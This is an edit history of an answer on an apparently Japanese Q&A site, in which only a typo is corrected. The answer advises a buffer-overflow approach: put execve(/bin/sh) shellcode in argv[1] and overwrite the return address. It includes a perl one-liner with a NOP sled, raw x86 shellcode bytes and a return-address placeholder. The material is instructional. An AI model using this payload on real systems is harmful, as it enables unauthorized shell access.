回答編集履歴
1
感→感じ
answer
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
NXも無効であれば、ret2libcではなくargv[1]に入っているshellcodeの移動した方が簡単気がします。例えば、[execve(/bin/sh)のshellcode](http://shell-storm.org/shellcode/files/shellcode-827.php)を書き込んで、RETをそのアドレスに書き換えてみればいかがでしょうか?
|
|
2
2
|
|
|
3
|
-
こういう感で、nop-sledのサイズとoffsetを自分で調整してみてください。
|
|
3
|
+
こういう感じで、nop-sledのサイズとoffsetを自分で調整してみてください。
|
|
4
4
|
```bash
|
|
5
5
|
$ perl -e 'print "\x90"x53,"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80","<little-endianでargv[1]のおよそのアドレス>"x15'
|
|
6
6
|
```
|